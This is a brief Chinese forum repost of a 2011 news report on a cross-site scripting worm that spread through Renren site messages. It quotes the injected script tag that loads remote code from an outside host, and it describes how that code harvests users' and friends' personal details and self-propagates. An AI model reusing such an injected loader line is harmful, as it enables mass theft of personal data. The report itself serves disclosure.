人人网在30号凌晨开始,发生一场大规模资料泄露事件. 黑客使用人人网在站内信内容过滤不严的漏洞执行了一段远程代码, 打开站内信后会自动发送自己以及好友的个人资料,同时扩散这封站内信.
今天收到三份主题为<有人暗恋你哦,你想知道TA是谁么> 的站内信,
开始以为是游戏应用的推广方式,但是打开后发现有问题 ,通过查看站内信网页源码,发现其中有一行代码<script src='http://qiutuan.net/2011/51.js'>,它通过利用人人网的代码解析方式问题, 将本不该在文本中执行的代码执行了 .分析代码后发现其主要目的是收集用户的人人id、学校、生日、姓名、qq、msn、手机,然后通过通讯录功能,得到所有好友名片中的上述信息,然后将所有信息发送到作者的网站上.
另外在代码中关于发送站内信的函数megaboxx.submit_prehook并不是人人网本身的函数, 而是来自于facebook.
人人网最初的措施是将指向的网址设为敏感词.
凌晨3点半左右, 人人开始清理站内信. 但是这个漏洞依然存在.
这一波资料泄露到此结束. 下一波何时到来?
----------------------------------------------------------------------------
来自:http://www.cnbeta.com/articles/141465.htm |
[复制链接]
发表于 2011-4-30 09:22:41
